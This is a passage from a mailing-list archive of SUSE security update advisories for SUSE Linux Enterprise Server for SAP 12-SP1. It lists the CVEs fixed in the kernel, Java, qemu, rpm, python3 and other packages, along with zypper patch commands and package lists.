   - Clean up code that saves the previous versions of redefined classes
   - Prevent SIGSEGV in ReceiverTypeData::clean_weak_klass_links
   - RedefineClasses() tests fail assert(((Metadata*)obj)->is_valid()) failed:
     obj is valid
   - NMT is not enabled if NMT option is specified after class path specifiers
   - EndEntityChecker should not process custom extensions after PKIX validation
   - SupportedDSAParamGen.java failed with timeout
   - Montgomery multiply intrinsic should use correct name
   - When determining the ciphersuite lists, there is no debug output for
     disabled suites.
   - sun/security/mscapi/SignedObjectChain.java fails on Windows
   - On Windows Swing changes keyboard layout on a window activation
   - IfNode::range_check_trap_proj() should handler dying subgraph with single
     if proj
   - Even better Internet address support
   - Newlines in JAXB string values of SOAP-requests are escaped to " "
   - TestFlushableGZIPOutputStream failing with IndexOutOfBoundsException
   - Unable to use JDWP API in JDK 8 to debug JDK 9 VM
   - Hotspot crash on Cassandra 3.11.1 startup with libnuma 2.0.3
   - Performance drop with Java JDK 1.8.0_162-b32
   - Upgrade time-zone data to tzdata2018d
   - Fix potential crash in BufImg_SetupICM
   - JDK 8u181 l10n resource file update
   - Remove debug print statements from RMI fix
   - (tz) Upgrade time-zone data to tzdata2018e
   - ObjectInputStream filterCheck method throws NullPointerException
   - adjust reflective access checks

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1070=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   java-1_8_0-openjdk-1.8.0.181-27.26.2
   java-1_8_0-openjdk-debuginfo-1.8.0.181-27.26.2
   java-1_8_0-openjdk-debugsource-1.8.0.181-27.26.2
   java-1_8_0-openjdk-demo-1.8.0.181-27.26.2
   java-1_8_0-openjdk-demo-debuginfo-1.8.0.181-27.26.2
   java-1_8_0-openjdk-devel-1.8.0.181-27.26.2
   java-1_8_0-openjdk-headless-1.8.0.181-27.26.2
   java-1_8_0-openjdk-headless-debuginfo-1.8.0.181-27.26.2

References:

   https://www.suse.com/security/cve/CVE-2018-2938.html
   https://www.suse.com/security/cve/CVE-2018-2940.html
   https://www.suse.com/security/cve/CVE-2018-2952.html
   https://www.suse.com/security/cve/CVE-2018-2973.html
   https://www.suse.com/security/cve/CVE-2018-3639.html
   https://bugzilla.suse.com/1101644
   https://bugzilla.suse.com/1101645
   https://bugzilla.suse.com/1101651
   https://bugzilla.suse.com/1101656
   https://bugzilla.suse.com/1106812

From sle-security-updates at lists.suse.com Sat Apr 27 16:18:39 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:18:39 +0200 (CEST)
Subject: SUSE-SU-2018:2908-2: important: Security update for the Linux Kernel
Message-ID: <20190427221839.2A3E2F3D3@maintenance.suse.de>

SUSE Security Update: Security update for the Linux Kernel
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:2908-2
Rating:             important
References:         #1012382 #1024788 #1062604 #1064233 #1065999 #1090534
                    #1090955 #1091171 #1092903 #1096547 #1097104 #1097108
                    #1099811 #1099813 #1099844 #1099845 #1099846 #1099849
                    #1099863 #1099864 #1099922 #1100001 #1102870 #1103445
                    #1104319 #1104495 #1104818 #1104906 #1105100 #1105322
                    #1105323 #1105396 #1106095 #1106369 #1106509 #1106511
                    #1107689 #1108912
Cross-References:   CVE-2018-10853 CVE-2018-10876 CVE-2018-10877
                    CVE-2018-10878 CVE-2018-10879 CVE-2018-10880
                    CVE-2018-10881 CVE-2018-10882 CVE-2018-10883
                    CVE-2018-10902 CVE-2018-10940 CVE-2018-12896
                    CVE-2018-13093 CVE-2018-14617 CVE-2018-14634
                    CVE-2018-16276 CVE-2018-16658 CVE-2018-6554
                    CVE-2018-6555
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that solves 19 vulnerabilities and has 19 fixes is now available.

Description:

   The SUSE Linux Enterprise 12 SP1 kernel was updated to receive various
   security and bugfixes.

   The following security bugs were fixed:

   - CVE-2018-14634: Prevent integer overflow in create_elf_tables that allowed
     a local attacker to exploit this vulnerability via a SUID-root binary and
     obtain full root privileges (bsc#1108912)
   - CVE-2018-14617: Prevent NULL pointer dereference and panic in
     hfsplus_lookup() when opening a file (that is purportedly a hard link) in
     an hfs+ filesystem that has malformed catalog data, and is mounted
     read-only without a metadata directory (bsc#1102870)
   - CVE-2018-16276: Incorrect bounds checking in the yurex USB driver in
     yurex_read allowed local attackers to use user access read/writes to crash
     the kernel or potentially escalate privileges (bsc#1106095)
   - CVE-2018-12896: Prevent integer overflow in the POSIX timer code that was
     caused by the way the overrun accounting works. Depending on interval and
     expiry time values, the overrun can be larger than INT_MAX, but the
     accounting is int based. This basically made the accounting values, which
     are visible to user space via timer_getoverrun(2) and siginfo::si_overrun,
     random. This allowed a local user to cause a denial of service (signed
     integer overflow) via crafted mmap, futex, timer_create, and timer_settime
     system calls (bnc#1099922)
   - CVE-2018-13093: Prevent NULL pointer dereference and panic in lookup_slow()
     on a NULL inode->i_ops pointer when doing pathwalks on a corrupted xfs
     image.
     This occurred because of a lack of proper validation that cached inodes are
     free during allocation (bnc#1100001)
   - CVE-2018-10940: The cdrom_ioctl_media_changed function allowed local
     attackers to use an incorrect bounds check in the CDROM driver
     CDROM_MEDIA_CHANGED ioctl to read out kernel memory (bsc#1092903)
   - CVE-2018-16658: Prevent information leak in cdrom_ioctl_drive_status that
     could have been used by local attackers to read kernel memory (bnc#1107689)
   - CVE-2018-6555: The irda_setsockopt function allowed local users to cause a
     denial of service (ias_object use-after-free and system crash) or possibly
     have unspecified other impact via an AF_IRDA socket (bnc#1106511)
   - CVE-2018-6554: Prevent memory leak in the irda_bind function that allowed
     local users to cause a denial of service (memory consumption) by repeatedly
     binding an AF_IRDA socket (bnc#1106509)
   - CVE-2018-10902: Protect against concurrent access to prevent double realloc
     (double free) in snd_rawmidi_input_params() and
     snd_rawmidi_output_status(). A malicious local attacker could have used
     this for privilege escalation (bnc#1105322)
   - CVE-2018-10879: A local user could have caused a use-after-free in
     ext4_xattr_set_entry function and a denial of service or unspecified other
     impact by renaming a file in a crafted ext4 filesystem image (bsc#1099844)
   - CVE-2018-10883: A local user could have caused an out-of-bounds write in
     jbd2_journal_dirty_metadata(), a denial of service, and a system crash by
     mounting and operating on a crafted ext4 filesystem image (bsc#1099863)
   - CVE-2018-10880: Prevent stack-out-of-bounds write in the ext4 filesystem
     code when mounting and writing to a crafted ext4 image in
     ext4_update_inline_data().
     An attacker could have used this to cause a system crash and a denial of
     service (bsc#1099845)
   - CVE-2018-10882: A local user could have caused an out-of-bound write, a
     denial of service, and a system crash by unmounting a crafted ext4
     filesystem image (bsc#1099849)
   - CVE-2018-10881: A local user could have caused an out-of-bound access in
     ext4_get_group_info function, a denial of service, and a system crash by
     mounting and operating on a crafted ext4 filesystem image (bsc#1099864)
   - CVE-2018-10877: Prevent out-of-bound access in the ext4_ext_drop_refs()
     function when operating on a crafted ext4 filesystem image (bsc#1099846)
   - CVE-2018-10876: A use-after-free was possible in ext4_ext_remove_space()
     function when mounting and operating a crafted ext4 image (bsc#1099811)
   - CVE-2018-10878: A local user could have caused an out-of-bounds write and a
     denial of service or unspecified other impact by mounting and operating a
     crafted ext4 filesystem image (bsc#1099813)
   - CVE-2018-10853: The KVM hypervisor did not check the current privilege
     level (CPL) while emulating unprivileged instructions. An unprivileged
     guest user/process could have used this flaw to potentially escalate
     privileges inside the guest (bsc#1097104).

   The following non-security bugs were fixed:

   - KEYS: prevent creating a different user's keyrings (bnc#1065999).
   - KVM: MMU: always terminate page walks at level 1 (bsc#1062604).
   - KVM: MMU: simplify last_pte_bitmap (bsc#1062604).
   - KVM: VMX: Work around kABI breakage in 'enum vmx_l1d_flush_state'
     (bsc#1106369).
   - KVM: VMX: fixes for vmentry_l1d_flush module parameter (bsc#1106369).
   - KVM: nVMX: update last_nonleaf_level when initializing nested EPT
     (bsc#1062604).
   - Refresh patches.xen/xen3-x86-l1tf-04-protect-PROT_NONE-ptes.patch
     (bsc#1105100).
   - Do not report CPU affected by L1TF when ARCH_CAP_RDCL_NO bit is set
     (bsc#1104906).
   - Revert "- Disable patches.arch/x86-mm-Simplify-p-g4um-d_page-macros.patch"
     (bnc#1104818)
   - bcache: avoid unnecessary cache prefetch bch_btree_node_get().
   - bcache: calculate the number of incremental GC nodes according to the
     total of btree nodes.
   - bcache: display rate debug parameters to 0 when writeback is not running.
   - bcache: do not check return value of debugfs_create_dir().
   - bcache: finish incremental GC.
   - bcache: fix I/O significant decline while backend devices registering.
   - bcache: fix error setting writeback_rate through sysfs interface
     (bsc#1064233).
   - bcache: free heap cache_set->flush_btree in bch_journal_free.
   - bcache: make the pr_err statement used for ENOENT only in sysfs_attatch
     section.
   - bcache: release dc->writeback_lock properly in bch_writeback_thread().
   - bcache: set max writeback rate when I/O request is idle (bsc#1064233).
   - bcache: simplify the calculation of the total amount of flash dirty data.
   - cifs: Fix infinite loop when using hard mount option (bsc#1091171).
   - ext4: check for allocation block validity with block group locked
     (bsc#1104495).
   - ext4: do not update checksum of new initialized bitmaps (bnc#1012382).
   - ext4: fix check to prevent initializing reserved inodes (bsc#1104319).
   - ext4: fix false negatives *and* false positives in ext4_check_descriptors()
     (bsc#1103445).
   - restore cond_resched() in shrink_dcache_parent().
   - usbip: vhci_sysfs: fix potential Spectre v1 (bsc#1096547).
   - x86, l1tf: Protect PROT_NONE PTEs against speculation fixup (bnc#1104818).
   - x86/speculation: Use ARCH_CAPABILITIES to skip L1D flush on vmentry
     (bsc#1106369).
   - xen, x86, l1tf: Protect PROT_NONE PTEs against speculation fixup
     (bnc#1104818).
   - xfs: Remove dead code from inode recover function (bsc#1105396).
   - xfs: convert XFS_AGFL_SIZE to a helper function (bsc#1090955, bsc#1090534).
   - xfs: detect agfl count corruption and reset agfl (bsc#1090955,
     bsc#1090534).
   - xfs: do not log/recover swapext extent owner changes for deleted inodes
     (bsc#1090955).
   - xfs: protect inode ->di_dmstate with a spinlock (bsc#1024788).
   - xfs: repair malformed inode items during log recovery (bsc#1105396).

Special Instructions and Notes:

   Please reboot the system after installing this update.

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1065=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   kernel-default-3.12.74-60.64.104.1
   kernel-default-base-3.12.74-60.64.104.1
   kernel-default-base-debuginfo-3.12.74-60.64.104.1
   kernel-default-debuginfo-3.12.74-60.64.104.1
   kernel-default-debugsource-3.12.74-60.64.104.1
   kernel-default-devel-3.12.74-60.64.104.1
   kernel-syms-3.12.74-60.64.104.1
   kernel-xen-3.12.74-60.64.104.1
   kernel-xen-base-3.12.74-60.64.104.1
   kernel-xen-base-debuginfo-3.12.74-60.64.104.1
   kernel-xen-debuginfo-3.12.74-60.64.104.1
   kernel-xen-debugsource-3.12.74-60.64.104.1
   kernel-xen-devel-3.12.74-60.64.104.1
   kgraft-patch-3_12_74-60_64_104-default-1-2.5.1
   kgraft-patch-3_12_74-60_64_104-xen-1-2.5.1

- SUSE Linux Enterprise Server for SAP 12-SP1 (noarch):

   kernel-devel-3.12.74-60.64.104.1
   kernel-macros-3.12.74-60.64.104.1
   kernel-source-3.12.74-60.64.104.1

References:

   https://www.suse.com/security/cve/CVE-2018-10853.html
   https://www.suse.com/security/cve/CVE-2018-10876.html
   https://www.suse.com/security/cve/CVE-2018-10877.html
   https://www.suse.com/security/cve/CVE-2018-10878.html
   https://www.suse.com/security/cve/CVE-2018-10879.html
   https://www.suse.com/security/cve/CVE-2018-10880.html
   https://www.suse.com/security/cve/CVE-2018-10881.html
   https://www.suse.com/security/cve/CVE-2018-10882.html
   https://www.suse.com/security/cve/CVE-2018-10883.html
   https://www.suse.com/security/cve/CVE-2018-10902.html
   https://www.suse.com/security/cve/CVE-2018-10940.html
   https://www.suse.com/security/cve/CVE-2018-12896.html
   https://www.suse.com/security/cve/CVE-2018-13093.html
   https://www.suse.com/security/cve/CVE-2018-14617.html
   https://www.suse.com/security/cve/CVE-2018-14634.html
   https://www.suse.com/security/cve/CVE-2018-16276.html
   https://www.suse.com/security/cve/CVE-2018-16658.html
   https://www.suse.com/security/cve/CVE-2018-6554.html
   https://www.suse.com/security/cve/CVE-2018-6555.html
   https://bugzilla.suse.com/1012382
   https://bugzilla.suse.com/1024788
   https://bugzilla.suse.com/1062604
   https://bugzilla.suse.com/1064233
   https://bugzilla.suse.com/1065999
   https://bugzilla.suse.com/1090534
   https://bugzilla.suse.com/1090955
   https://bugzilla.suse.com/1091171
   https://bugzilla.suse.com/1092903
   https://bugzilla.suse.com/1096547
   https://bugzilla.suse.com/1097104
   https://bugzilla.suse.com/1097108
   https://bugzilla.suse.com/1099811
   https://bugzilla.suse.com/1099813
   https://bugzilla.suse.com/1099844
   https://bugzilla.suse.com/1099845
   https://bugzilla.suse.com/1099846
   https://bugzilla.suse.com/1099849
   https://bugzilla.suse.com/1099863
   https://bugzilla.suse.com/1099864
   https://bugzilla.suse.com/1099922
   https://bugzilla.suse.com/1100001
   https://bugzilla.suse.com/1102870
   https://bugzilla.suse.com/1103445
   https://bugzilla.suse.com/1104319
   https://bugzilla.suse.com/1104495
   https://bugzilla.suse.com/1104818
   https://bugzilla.suse.com/1104906
   https://bugzilla.suse.com/1105100
   https://bugzilla.suse.com/1105322
   https://bugzilla.suse.com/1105323
   https://bugzilla.suse.com/1105396
   https://bugzilla.suse.com/1106095
   https://bugzilla.suse.com/1106369
   https://bugzilla.suse.com/1106509
   https://bugzilla.suse.com/1106511
   https://bugzilla.suse.com/1107689
   https://bugzilla.suse.com/1108912

From sle-security-updates at lists.suse.com Sat Apr 27 16:25:20 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:25:20 +0200 (CEST)
Subject: SUSE-SU-2018:3447-2: important: Security update for net-snmp
Message-ID: <20190427222520.A51DFF3D3@maintenance.suse.de>

SUSE Security Update: Security update for net-snmp
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:3447-2
Rating:             important
References:         #1027353 #1081164 #1102775 #1111122
Cross-References:   CVE-2018-18065
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that solves one vulnerability and has three fixes is now available.

Description:

   This update for net-snmp fixes the following issues:

   Security issues fixed:

   - CVE-2018-18065: _set_key in agent/helpers/table_container.c had a NULL
     Pointer Exception bug that can be used by an authenticated attacker to
     remotely cause the instance to crash via a crafted UDP packet, resulting in
     Denial of Service (bsc#1111122)

   Non-security issues fixed:

   - swintst_rpm: Protect against unspecified Group name (bsc#1102775)
   - Add tsm and tlstm MIBs and the USM security module (bsc#1081164)
   - Fix agentx freezing on timeout (bsc#1027353)

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1064=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   libsnmp30-32bit-5.7.3-6.3.1
   libsnmp30-5.7.3-6.3.1
   libsnmp30-debuginfo-32bit-5.7.3-6.3.1
   libsnmp30-debuginfo-5.7.3-6.3.1
   net-snmp-5.7.3-6.3.1
   net-snmp-debuginfo-5.7.3-6.3.1
   net-snmp-debugsource-5.7.3-6.3.1
   perl-SNMP-5.7.3-6.3.1
   perl-SNMP-debuginfo-5.7.3-6.3.1
   snmp-mibs-5.7.3-6.3.1

References:

   https://www.suse.com/security/cve/CVE-2018-18065.html
   https://bugzilla.suse.com/1027353
   https://bugzilla.suse.com/1081164
   https://bugzilla.suse.com/1102775
   https://bugzilla.suse.com/1111122

From sle-security-updates at lists.suse.com Sat Apr 27 16:26:59 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:26:59 +0200 (CEST)
Subject: SUSE-SU-2018:3342-2: moderate: Security update for ntp
Message-ID: <20190427222659.38DE2F3D3@maintenance.suse.de>

SUSE Security Update: Security update for ntp
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:3342-2
Rating:             moderate
References:         #1083424 #1098531 #1111853
Cross-References:   CVE-2018-12327 CVE-2018-7170
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that solves two vulnerabilities and has one errata is now
   available.

Description:

   NTP was updated to 4.2.8p12 (bsc#1111853):

   - CVE-2018-12327: Fixed stack buffer overflow in the openhost() command-line
     call of NTPQ/NTPDC (bsc#1098531)
   - CVE-2018-7170: Add further tweaks to improve the fix for the ephemeral
     association time spoofing additional protection (bsc#1083424)

   Please also see
   https://www.nwtime.org/network-time-foundation-publishes-ntp-4-2-8p12/
   for more information.
Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1066=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   ntp-4.2.8p12-64.8.2
   ntp-debuginfo-4.2.8p12-64.8.2
   ntp-debugsource-4.2.8p12-64.8.2
   ntp-doc-4.2.8p12-64.8.2

References:

   https://www.suse.com/security/cve/CVE-2018-12327.html
   https://www.suse.com/security/cve/CVE-2018-7170.html
   https://bugzilla.suse.com/1083424
   https://bugzilla.suse.com/1098531
   https://bugzilla.suse.com/1111853

From sle-security-updates at lists.suse.com Sat Apr 27 16:27:48 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:27:48 +0200 (CEST)
Subject: SUSE-SU-2018:3033-3: important: Security update for texlive
Message-ID: <20190427222748.C5122F3D3@maintenance.suse.de>

SUSE Security Update: Security update for texlive
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:3033-3
Rating:             important
References:         #1109673
Cross-References:   CVE-2018-17407
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes one vulnerability is now available.

Description:

   This update for texlive fixes the following issue:

   - CVE-2018-17407: Prevent a buffer overflow in the handling of Type 1 fonts
     that allowed arbitrary code execution when a malicious font was loaded by
     one of the vulnerable tools: pdflatex, pdftex, dvips, or luatex
     (bsc#1109673)

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-458=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   libkpathsea6-6.2.0dev-22.3.1
   libkpathsea6-debuginfo-6.2.0dev-22.3.1

References:

   https://www.suse.com/security/cve/CVE-2018-17407.html
   https://bugzilla.suse.com/1109673

From sle-security-updates at lists.suse.com Sat Apr 27 16:34:09 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:34:09 +0200 (CEST)
Subject: SUSE-SU-2018:3884-2: important: Security update for rpm
Message-ID: <20190427223409.2AEDEF3D3@maintenance.suse.de>

SUSE Security Update: Security update for rpm
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:3884-2
Rating:             important
References:         #943457
Cross-References:   CVE-2017-7500 CVE-2017-7501
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes two vulnerabilities is now available.

Description:

   This update for rpm fixes the following issues:

   These security issues were fixed:

   - CVE-2017-7500: rpm did not properly handle RPM installations when a
     destination path was a symbolic link to a directory, possibly changing
     ownership and permissions of an arbitrary directory, and RPM files being
     placed in an arbitrary destination (bsc#943457).
   - CVE-2017-7501: rpm used temporary files with predictable names when
     installing an RPM.
     An attacker with ability to write in a directory where files will be
     installed could create symbolic links to an arbitrary location and modify
     content, and possibly permissions to arbitrary files, which could be used
     for denial of service or possibly privilege escalation (bsc#943457)

   This is a reissue of the above security fixes for SUSE Linux Enterprise 12
   GA, SP1 and SP2 LTSS; they have already been released for SUSE Linux
   Enterprise Server 12 SP3.

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1062=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   python3-rpm-4.11.2-16.21.1
   python3-rpm-debuginfo-4.11.2-16.21.1
   python3-rpm-debugsource-4.11.2-16.21.1
   rpm-32bit-4.11.2-16.21.1
   rpm-4.11.2-16.21.1
   rpm-build-4.11.2-16.21.1
   rpm-build-debuginfo-4.11.2-16.21.1
   rpm-debuginfo-32bit-4.11.2-16.21.1
   rpm-debuginfo-4.11.2-16.21.1
   rpm-debugsource-4.11.2-16.21.1
   rpm-python-4.11.2-16.21.1
   rpm-python-debuginfo-4.11.2-16.21.1
   rpm-python-debugsource-4.11.2-16.21.1

References:

   https://www.suse.com/security/cve/CVE-2017-7500.html
   https://www.suse.com/security/cve/CVE-2017-7501.html
   https://bugzilla.suse.com/943457

From sle-security-updates at lists.suse.com Sat Apr 27 16:35:06 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:35:06 +0200 (CEST)
Subject: SUSE-SU-2019:0243-2: important: Security update for python3
Message-ID: <20190427223506.3F2DDF3D3@maintenance.suse.de>

SUSE Security Update: Security update for python3
______________________________________________________________________________

Announcement ID:    SUSE-SU-2019:0243-2
Rating:             important
References:         #1120644 #1122191
Cross-References:   CVE-2018-20406 CVE-2019-5010
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes two vulnerabilities is now available.

Description:

   This update for python3 fixes the following issues:

   Security issues fixed:

   - CVE-2019-5010: Fixed a denial-of-service vulnerability in the X509
     certificate parser (bsc#1122191)
   - CVE-2018-20406: Fixed an integer overflow via a large LONG_BINPUT
     (bsc#1120644)

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".

   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-243=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   libpython3_4m1_0-3.4.6-25.21.1
   libpython3_4m1_0-debuginfo-3.4.6-25.21.1
   python3-3.4.6-25.21.1
   python3-base-3.4.6-25.21.1
   python3-base-debuginfo-3.4.6-25.21.1
   python3-base-debugsource-3.4.6-25.21.1
   python3-debuginfo-3.4.6-25.21.1
   python3-debugsource-3.4.6-25.21.1

References:

   https://www.suse.com/security/cve/CVE-2018-20406.html
   https://www.suse.com/security/cve/CVE-2019-5010.html
   https://bugzilla.suse.com/1120644
   https://bugzilla.suse.com/1122191

From sle-security-updates at lists.suse.com Sat Apr 27 16:35:46 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:35:46 +0200 (CEST)
Subject: SUSE-SU-2018:3973-2: moderate: Security update for qemu
Message-ID: <20190427223546.807DCF3D3@maintenance.suse.de>

SUSE Security Update: Security update for qemu
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:3973-2
Rating:             moderate
References:         #1106222 #1110910 #1111006 #1111010 #1111013 #1114422
Cross-References:   CVE-2018-10839 CVE-2018-15746 CVE-2018-17958
                    CVE-2018-17962 CVE-2018-17963 CVE-2018-18849
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes 6 vulnerabilities is now available.

Description:

   This update for qemu fixes the following issues:

   Security issues fixed:

   - CVE-2018-10839: Fixed the NE2000 NIC emulation support that was vulnerable
     to an integer overflow, which could lead to a buffer overflow. It could
     occur when receiving packets over the network. A user inside the guest
     could use this flaw to crash the Qemu process, resulting in DoS
     (bsc#1110910).
   - CVE-2018-15746: Fixed qemu-seccomp.c that might allow local OS guest users
     to cause a denial of service (guest crash) by leveraging mishandling of
     the seccomp policy for threads other than the main thread (bsc#1106222).
   - CVE-2018-17958: Fixed a Buffer Overflow in rtl8139_do_receive in
     hw/net/rtl8139.c because an incorrect integer data type is used
     (bsc#1111006).
   - CVE-2018-17962: Fixed a Buffer Overflow in pcnet_receive in
     hw/net/pcnet.c because an incorrect integer data type is used
     (bsc#1111010).
   - CVE-2018-17963: Fixed qemu_deliver_packet_iov in net/net.c that accepts
     packet sizes greater than INT_MAX, which allows attackers to cause a
     denial of service or possibly have unspecified other impact (bsc#1111013)
   - CVE-2018-18849: Fixed an out of bounds memory access issue that was found
     in the LSI53C895A SCSI Host Bus Adapter emulation while writing a message
     in lsi_do_msgin. It could occur during migration if the 'msg_len' field
     has an invalid value. A user/process could use this flaw to crash the
     Qemu process, resulting in DoS (bsc#1114422).

Patch Instructions:

   To install this SUSE Security Update use the SUSE recommended installation
   methods like YaST online_update or "zypper patch".
   Alternatively you can run the command listed for your product:

   - SUSE Linux Enterprise Server for SAP 12-SP1:

      zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1077=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

   qemu-2.3.1-33.17.1
   qemu-block-curl-2.3.1-33.17.1
   qemu-block-curl-debuginfo-2.3.1-33.17.1
   qemu-block-rbd-2.3.1-33.17.1
   qemu-block-rbd-debuginfo-2.3.1-33.17.1
   qemu-debugsource-2.3.1-33.17.1
   qemu-guest-agent-2.3.1-33.17.1
   qemu-guest-agent-debuginfo-2.3.1-33.17.1
   qemu-kvm-2.3.1-33.17.1
   qemu-lang-2.3.1-33.17.1
   qemu-tools-2.3.1-33.17.1
   qemu-tools-debuginfo-2.3.1-33.17.1
   qemu-x86-2.3.1-33.17.1

- SUSE Linux Enterprise Server for SAP 12-SP1 (noarch):

   qemu-ipxe-1.0.0-33.17.1
   qemu-seabios-1.8.1-33.17.1
   qemu-sgabios-8-33.17.1
   qemu-vgabios-1.8.1-33.17.1

References:

   https://www.suse.com/security/cve/CVE-2018-10839.html
   https://www.suse.com/security/cve/CVE-2018-15746.html
   https://www.suse.com/security/cve/CVE-2018-17958.html
   https://www.suse.com/security/cve/CVE-2018-17962.html
   https://www.suse.com/security/cve/CVE-2018-17963.html
   https://www.suse.com/security/cve/CVE-2018-18849.html
   https://bugzilla.suse.com/1106222
   https://bugzilla.suse.com/1110910
   https://bugzilla.suse.com/1111006
   https://bugzilla.suse.com/1111010
   https://bugzilla.suse.com/1111013
   https://bugzilla.suse.com/1114422

From sle-security-updates at lists.suse.com Sat Apr 27 16:37:33 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Sun, 28 Apr 2019 00:37:33 +0200 (CEST)
Subject: SUSE-SU-2018:4064-2: important: Security update for java-1_8_0-ibm
Message-ID: <20190427223733.DAF79F3D3@maintenance.suse.de>

SUSE Security Update: Security update for java-1_8_0-ibm
______________________________________________________________________________

Announcement ID:    SUSE-SU-2018:4064-2
Rating:             important
References:         #1116574
Cross-References:   CVE-2018-13785 CVE-2018-3136 CVE-2018-3139 CVE-2018-3149
                    CVE-2018-3169 CVE-2018-3180 CVE-2018-3183 CVE-2018-3214
Affected Products:
                    SUSE Linux Enterprise Server for SAP 12-SP1
______________________________________________________________________________

   An update that fixes 8 vulnerabilities is now available.

Description:

   java-1_8_0-ibm was updated to Java 8.0 Service Refresh 5 Fix Pack 25
   (bsc#1116574)

   * Class Libraries:
     - IJ10934 CVE-2018-13785
     - IJ10935 CVE-2018-3136
     - IJ10895 CVE-2018-3139
     - IJ10932 CVE-2018-3149
     - IJ10894 CVE-2018-3180
     - IJ10930 CVE-2018-3183
     - IJ10933 CVE-2018-3214
     - IJ09315 FLOATING POINT EXCEPTION FROM JAVA.TEXT.DECIMALFORMAT.FORMAT
     - IJ09088 INTRODUCING A NEW PROPERTY FOR TURKEY TIMEZONE FOR PRODUCTS NOT
       IDENTIFYING TRT
     - IJ10800 REMOVE EXPIRING ROOT CERTIFICATES IN IBM JDK'S CACERTS.
     - IJ10566 SUPPORT EBCDIC CODE PAGE IBM-274 - BELGIUM EBCDIC
   * Java Virtual Machine
     - IJ08730 APPLICATION SIGNAL HANDLER NOT INVOKED FOR SIGABRT
     - IJ10453 ASSERTION FAILURE AT CLASSPATHITEM.CPP
     - IJ09574 CLASSLOADER DEFINED THROUGH SYSTEM PROPERTY
       'JAVA.SYSTEM.CLASS.LOADER' IS NOT HONORED.
     - IJ10931 CVE-2018-3169
     - IJ10618 GPU SORT: UNSPECIFIED LAUNCH FAILURE
     - IJ10619 INCORRECT ILLEGALARGUMENTEXCEPTION BECAUSE OBJECT IS NOT AN
       INSTANCE OF DECLARING CLASS ON REFLECTIVE INVOCATION
     - IJ10135 JVM HUNG IN GARBAGECOLLECTORMXBEAN.GETLASTGCINFO() API
     - IJ10680 RECURRENT ABORTED SCAVENGE
   * ORB
     - IX90187 CLIENTREQUESTIMPL.REINVOKE FAILS WITH
       JAVA.LANG.INDEXOUTOFBOUNDSEXCEPTION
   * Reliability and Serviceability
